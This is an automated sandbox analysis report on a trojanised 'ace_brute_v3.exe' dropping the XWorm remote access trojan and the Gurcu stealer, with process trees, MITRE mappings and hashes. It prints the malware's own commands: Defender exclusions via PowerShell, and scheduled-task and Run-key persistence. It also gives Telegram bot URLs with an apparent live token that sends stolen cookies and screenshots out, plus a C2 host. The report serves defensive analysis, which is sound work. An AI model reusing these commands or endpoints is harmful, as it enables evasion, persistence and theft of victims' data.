gurcu | db3f35ead020e7aecfdba98d1e5145ced413a01984793f6d57834798dd0de0a6

Analysis

max time kernel
446s
max time network
449s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26-11-2024 00:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ace_brute_v3.exe
Size

20.7MB
MD5

8ce170fe4a60c76558c96e9a75fb49a7
SHA1

a6211291e0933b93582ae06955977a98d69e7514
SHA256

db3f35ead020e7aecfdba98d1e5145ced413a01984793f6d57834798dd0de0a6
SHA512

2ed2b6264abdac610f25361808697fbaad6e7a33f67c84db118cb932528d184f3ffb1d86fbc1487e1303d722b7cb81b46bcf37a2f0c314b054f162872a7c6a1d
SSDEEP

393216:TCGBLUmCO0GQQFSs3laejYsB69XmyzTvJ8cr3jALaDhZVHkURVnX72kI7OVWNp:T1BLVCOtXFVjYZ9HnW1LaZHRXXm71D

Score

10^/10

gurcu xworm discovery execution persistence pyinstaller rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

find-rubber.gl.at.ply.gg:5426

Mutex

CRQoPEkBWWzMBNPO

Attributes

Install_directory
%AppData%
install_file
USB.exe

aes.plain

Extracted

Family

gurcu

https://api.telegram.org/bot7755383590:AAHvkcycZMKmP0sVjuasWVmWZcRu5CgLKA8/sendDocument?chat_id=-4507794940&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb

https://api.telegram.org/bot7755383590:AAHvkcycZMKmP0sVjuasWVmWZcRu5CgLKA8/sendMessage?chat_id=-4507794940

https://api.telegram.org/bot7755383590:AAHvkcycZMKmP0sVjuasWVmWZcRu5CgLKA8/getUpdates?offset=-

https://api.telegram.org/bot7755383590:AAHvkcycZMKmP0sVjuasWVmWZcRu5CgLKA8/sendDocument?chat_id=-4507794940&caption=%F0%9F%93%B8Screenshot%20take

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe	family_xworm
behavioral1/memory/4276-54-0x00000000001A0000-0x00000000001B2000-memory.dmp	family_xworm

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

Update.exeupdater.exe

description	pid	process	target process
PID 3360 created 3372	3360	Update.exe	Explorer.EXE
PID 3360 created 3372	3360	Update.exe	Explorer.EXE
PID 3704 created 3372	3704	updater.exe	Explorer.EXE
PID 3704 created 3372	3704	updater.exe	Explorer.EXE

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1848 powershell.exe
4340 powershell.exe
5040 powershell.exe
2848 powershell.exe
2920 powershell.exe
224 powershell.exe

pid	process
1848	powershell.exe
4340	powershell.exe
5040	powershell.exe
2848	powershell.exe
2920	powershell.exe
224	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

systemuser.exeace_brute_v3.exeGoogleUpdate.exeSystemUser.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	systemuser.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	ace_brute_v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	GoogleUpdate.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	SystemUser.exe

Drops startup file 2 IoCs

Processes:

GoogleUpdate.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemuser.lnk	GoogleUpdate.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemuser.lnk	GoogleUpdate.exe

Executes dropped EXE 9 IoCs

Processes:

SystemUser.exeGoogleUpdate.exeGoogIeUpdate.exeUpdate.exesystemuser.exeupdater.exesystemusersystemusersystemuser

pid	process
4172	SystemUser.exe
4276	GoogleUpdate.exe
1496	GoogIeUpdate.exe
3360	Update.exe
1992	systemuser.exe
3704	updater.exe
3732	systemuser
3128	systemuser
640	systemuser

Loads dropped DLL 2 IoCs

Processes:

SystemUser.exesystemuser.exe

pid process

4172 SystemUser.exe
1992 systemuser.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

GoogleUpdate.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\systemuser = "C:\\Users\\Admin\\AppData\\Roaming\\systemuser"	GoogleUpdate.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\systemuser.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

47 raw.githubusercontent.com
48 raw.githubusercontent.com
51 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

43 ip-api.com
Enumerates processes with tasklist 1 TTPs 1 IoCs
discovery

Process Discovery
T1057

Processes:

tasklist.exe

pid process

2728 tasklist.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

updater.exe

description pid process target process

PID 3704 set thread context of 5036 3704 updater.exe conhost.exe
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

flow	ioc
47	raw.githubusercontent.com
48	raw.githubusercontent.com
51	raw.githubusercontent.com

flow	ioc
43	ip-api.com

pid	process
2728	tasklist.exe

description	pid	process	target process
PID 3704 set thread context of 5036	3704	updater.exe	conhost.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\GoogIeUpdate.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
discovery

System Language Discovery
T1614.001

Processes:

ace_brute_v3.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ace_brute_v3.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ace_brute_v3.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

systemuser.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	systemuser.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	systemuser.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4336 timeout.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2256 reg.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

4028 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

GoogleUpdate.exe

pid process

4276 GoogleUpdate.exe

pid	process
4336	timeout.exe

pid	process
2256	reg.exe

pid	process
4028	schtasks.exe

pid	process
4276	GoogleUpdate.exe

Suspicious behavior: EnumeratesProcesses 56 IoCs

Processes:

SystemUser.exepowershell.exepowershell.exepowershell.exepowershell.exeGoogleUpdate.exesystemuser.exeUpdate.exepowershell.exeupdater.exepowershell.exe

pid	process
4172	SystemUser.exe
4172	SystemUser.exe
4172	SystemUser.exe
4172	SystemUser.exe
4172	SystemUser.exe
4172	SystemUser.exe
4172	SystemUser.exe
4172	SystemUser.exe
4172	SystemUser.exe
4172	SystemUser.exe
4172	SystemUser.exe
4172	SystemUser.exe
4172	SystemUser.exe
4172	SystemUser.exe
4172	SystemUser.exe
4172	SystemUser.exe
4172	SystemUser.exe
1848	powershell.exe
1848	powershell.exe
4340	powershell.exe
4340	powershell.exe
5040	powershell.exe
5040	powershell.exe
2848	powershell.exe
2848	powershell.exe
4276	GoogleUpdate.exe
1992	systemuser.exe
1992	systemuser.exe
1992	systemuser.exe
1992	systemuser.exe
1992	systemuser.exe
1992	systemuser.exe
1992	systemuser.exe
1992	systemuser.exe
1992	systemuser.exe
1992	systemuser.exe
1992	systemuser.exe
1992	systemuser.exe
1992	systemuser.exe
1992	systemuser.exe
1992	systemuser.exe
1992	systemuser.exe
1992	systemuser.exe
1992	systemuser.exe
3360	Update.exe
3360	Update.exe
2920	powershell.exe
2920	powershell.exe
3360	Update.exe
3360	Update.exe
3704	updater.exe
3704	updater.exe
224	powershell.exe
224	powershell.exe
3704	updater.exe
3704	updater.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

GoogleUpdate.exeSystemUser.exepowershell.exepowershell.exepowershell.exepowershell.exetasklist.exesystemuser.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4276	GoogleUpdate.exe
Token: SeDebugPrivilege	4172	SystemUser.exe
Token: SeDebugPrivilege	1848	powershell.exe
Token: SeDebugPrivilege	4340	powershell.exe
Token: SeDebugPrivilege	5040	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	2728	tasklist.exe
Token: SeDebugPrivilege	4276	GoogleUpdate.exe
Token: SeDebugPrivilege	1992	systemuser.exe
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeIncreaseQuotaPrivilege	2920	powershell.exe
Token: SeSecurityPrivilege	2920	powershell.exe
Token: SeTakeOwnershipPrivilege	2920	powershell.exe
Token: SeLoadDriverPrivilege	2920	powershell.exe
Token: SeSystemProfilePrivilege	2920	powershell.exe
Token: SeSystemtimePrivilege	2920	powershell.exe
Token: SeProfSingleProcessPrivilege	2920	powershell.exe
Token: SeIncBasePriorityPrivilege	2920	powershell.exe
Token: SeCreatePagefilePrivilege	2920	powershell.exe
Token: SeBackupPrivilege	2920	powershell.exe
Token: SeRestorePrivilege	2920	powershell.exe
Token: SeShutdownPrivilege	2920	powershell.exe
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeSystemEnvironmentPrivilege	2920	powershell.exe
Token: SeRemoteShutdownPrivilege	2920	powershell.exe
Token: SeUndockPrivilege	2920	powershell.exe
Token: SeManageVolumePrivilege	2920	powershell.exe
Token: 33	2920	powershell.exe
Token: 34	2920	powershell.exe
Token: 35	2920	powershell.exe
Token: 36	2920	powershell.exe
Token: SeIncreaseQuotaPrivilege	2920	powershell.exe
Token: SeSecurityPrivilege	2920	powershell.exe
Token: SeTakeOwnershipPrivilege	2920	powershell.exe
Token: SeLoadDriverPrivilege	2920	powershell.exe
Token: SeSystemProfilePrivilege	2920	powershell.exe
Token: SeSystemtimePrivilege	2920	powershell.exe
Token: SeProfSingleProcessPrivilege	2920	powershell.exe
Token: SeIncBasePriorityPrivilege	2920	powershell.exe
Token: SeCreatePagefilePrivilege	2920	powershell.exe
Token: SeBackupPrivilege	2920	powershell.exe
Token: SeRestorePrivilege	2920	powershell.exe
Token: SeShutdownPrivilege	2920	powershell.exe
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeSystemEnvironmentPrivilege	2920	powershell.exe
Token: SeRemoteShutdownPrivilege	2920	powershell.exe
Token: SeUndockPrivilege	2920	powershell.exe
Token: SeManageVolumePrivilege	2920	powershell.exe
Token: 33	2920	powershell.exe
Token: 34	2920	powershell.exe
Token: 35	2920	powershell.exe
Token: 36	2920	powershell.exe
Token: SeIncreaseQuotaPrivilege	2920	powershell.exe
Token: SeSecurityPrivilege	2920	powershell.exe
Token: SeTakeOwnershipPrivilege	2920	powershell.exe
Token: SeLoadDriverPrivilege	2920	powershell.exe
Token: SeSystemProfilePrivilege	2920	powershell.exe
Token: SeSystemtimePrivilege	2920	powershell.exe
Token: SeProfSingleProcessPrivilege	2920	powershell.exe
Token: SeIncBasePriorityPrivilege	2920	powershell.exe
Token: SeCreatePagefilePrivilege	2920	powershell.exe
Token: SeBackupPrivilege	2920	powershell.exe
Token: SeRestorePrivilege	2920	powershell.exe
Token: SeShutdownPrivilege	2920	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

GoogleUpdate.exesystemuser.exe

pid process

4276 GoogleUpdate.exe
1992 systemuser.exe

pid	process
4276	GoogleUpdate.exe
1992	systemuser.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

ace_brute_v3.exeGoogleUpdate.exeSystemUser.execmd.exesystemuser.execmd.exeupdater.exe

description	pid	process	target process
PID 4588 wrote to memory of 4172	4588	ace_brute_v3.exe	SystemUser.exe
PID 4588 wrote to memory of 4172	4588	ace_brute_v3.exe	SystemUser.exe
PID 4588 wrote to memory of 4276	4588	ace_brute_v3.exe	GoogleUpdate.exe
PID 4588 wrote to memory of 4276	4588	ace_brute_v3.exe	GoogleUpdate.exe
PID 4588 wrote to memory of 1496	4588	ace_brute_v3.exe	GoogIeUpdate.exe
PID 4588 wrote to memory of 1496	4588	ace_brute_v3.exe	GoogIeUpdate.exe
PID 4588 wrote to memory of 3360	4588	ace_brute_v3.exe	Update.exe
PID 4588 wrote to memory of 3360	4588	ace_brute_v3.exe	Update.exe
PID 4276 wrote to memory of 1848	4276	GoogleUpdate.exe	powershell.exe
PID 4276 wrote to memory of 1848	4276	GoogleUpdate.exe	powershell.exe
PID 4276 wrote to memory of 4340	4276	GoogleUpdate.exe	powershell.exe
PID 4276 wrote to memory of 4340	4276	GoogleUpdate.exe	powershell.exe
PID 4276 wrote to memory of 5040	4276	GoogleUpdate.exe	powershell.exe
PID 4276 wrote to memory of 5040	4276	GoogleUpdate.exe	powershell.exe
PID 4276 wrote to memory of 2848	4276	GoogleUpdate.exe	powershell.exe
PID 4276 wrote to memory of 2848	4276	GoogleUpdate.exe	powershell.exe
PID 4172 wrote to memory of 4796	4172	SystemUser.exe	cmd.exe
PID 4172 wrote to memory of 4796	4172	SystemUser.exe	cmd.exe
PID 4796 wrote to memory of 3852	4796	cmd.exe	chcp.com
PID 4796 wrote to memory of 3852	4796	cmd.exe	chcp.com
PID 4796 wrote to memory of 2728	4796	cmd.exe	tasklist.exe
PID 4796 wrote to memory of 2728	4796	cmd.exe	tasklist.exe
PID 4796 wrote to memory of 752	4796	cmd.exe	find.exe
PID 4796 wrote to memory of 752	4796	cmd.exe	find.exe
PID 4796 wrote to memory of 4336	4796	cmd.exe	timeout.exe
PID 4796 wrote to memory of 4336	4796	cmd.exe	timeout.exe
PID 4276 wrote to memory of 4028	4276	GoogleUpdate.exe	schtasks.exe
PID 4276 wrote to memory of 4028	4276	GoogleUpdate.exe	schtasks.exe
PID 4796 wrote to memory of 1992	4796	cmd.exe	systemuser.exe
PID 4796 wrote to memory of 1992	4796	cmd.exe	systemuser.exe
PID 1992 wrote to memory of 1704	1992	systemuser.exe	cmd.exe
PID 1992 wrote to memory of 1704	1992	systemuser.exe	cmd.exe
PID 1704 wrote to memory of 2256	1704	cmd.exe	reg.exe
PID 1704 wrote to memory of 2256	1704	cmd.exe	reg.exe
PID 3704 wrote to memory of 5036	3704	updater.exe	conhost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3372
- C:\Users\Admin\AppData\Local\Temp\ace_brute_v3.exe
  "C:\Users\Admin\AppData\Local\Temp\ace_brute_v3.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4588
- - C:\Users\Admin\AppData\Roaming\SystemUser.exe
    "C:\Users\Admin\AppData\Roaming\SystemUser.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4172
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpFF8F.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpFF8F.tmp.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4796
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:3852
    - - C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 4172"
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2728
    - - C:\Windows\system32\find.exe
        
        find ":"
        5⤵
        
        PID:752
    - - C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:4336
    - - C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\systemuser.exe
        
        "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\systemuser.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1992
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\systemuser.exe /f
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1704
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\systemuser.exe /f
        7⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2256
- - C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe
    "C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GoogleUpdate.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4340
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\systemuser'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5040
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemuser'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2848
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "systemuser" /tr "C:\Users\Admin\AppData\Roaming\systemuser"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4028
- - C:\Users\Admin\AppData\Roaming\GoogIeUpdate.exe
    "C:\Users\Admin\AppData\Roaming\GoogIeUpdate.exe"
    3⤵
    - Executes dropped EXE
    PID:1496
- - C:\Users\Admin\AppData\Roaming\Update.exe
    "C:\Users\Admin\AppData\Roaming\Update.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3360
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ikwps#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2920
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ikwps#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:224
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:5036

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3704

C:\Users\Admin\AppData\Roaming\systemuser
C:\Users\Admin\AppData\Roaming\systemuser
1⤵
- Executes dropped EXE
PID:3732

C:\Users\Admin\AppData\Roaming\systemuser
C:\Users\Admin\AppData\Roaming\systemuser
1⤵
- Executes dropped EXE
PID:3128

C:\Users\Admin\AppData\Roaming\systemuser
C:\Users\Admin\AppData\Roaming\systemuser
1⤵
- Executes dropped EXE
PID:640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\systemuser.exe.log

Filesize
1KB

MD5
83c6657d5c97604293de3be7cb049812

SHA1
049e9604e0dab53524bdbdb9459f6026df675468

SHA256
cc0829436efefdd39837147e213e968d549f35faa2e519e0a038731e4711368a

SHA512
6a814aeb121606355776d864f41dc62a311a151a33eff8593a24dc0748f86519f4f9391525d1eb3d161d3f976dda3470d5c2c2abd63d888b36c0b3822c91a9f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\systemuser.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a8e8360d573a4ff072dcc6f09d992c88

SHA1
3446774433ceaf0b400073914facab11b98b6807

SHA256
bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

SHA512
4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b77a9ceea31820624963a4d9bc92c3f2

SHA1
9d607362dd1e73dd0118f53d10dc40ceba96de51

SHA256
f6564fac403c9953410c87c206e15f5461791e939cb185fe033020f45ce7dd9f

SHA512
8a6469d41c193cdd57f575942f44b9a88f5a3e529e922ba2588fd292224c636a9702f6cb32e2d3a2cd2d276bb4b6734f863d87135e8693eb6defecf70f8c9693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
100b5eb2f8c2f9a0c297ca3f2fe05082

SHA1
37d56cc394ec2862b7d9ad13b4742ad6154c67cb

SHA256
249d526803e85f8b2ce99609e4d9b0ed463d269907a065c666c39c9cbe67c5f2

SHA512
451896e4852b2319bfe967ebc9d14cb1348231fd6b002d067540c75ce1b2af91305030a9c17d92a102222cba42fb873eafd30fbb046db25b074f8a632336b852

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b3fb55704b31b597b81f1a6afaa76ab9

SHA1
37beddce702ba85ed0e48e770ad95af65ab5bbf8

SHA256
dedfba8ad579eb654ec94b87591080211309493143cd4fd96498a94d7240e055

SHA512
e2667bfea3999743c9773cad2ad2e39a32650fd9f29c3d8448a00c8e923e2100ddeebae30c694dbc63d2e08e2147f051f54de2ec5f236415fae0948d3da56dbc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b8e9f0518f5b43df1d5f217abbe45e52

SHA1
94b5d6f4128230f97b7b97d157f1ea056f9cec6e

SHA256
5c835d22e9214feea62ef457a1b0eb105cb7cb6cceee8b77c519e071ef33027d

SHA512
ef489c7bce704726fb82a1ccfbd99be283a33b94139c0a7c32d71bdc72b1325191507dc5536dbb9c0d2fb00b12c159a26f1d54f2597d251646f5273dec9c357e

Download Submit
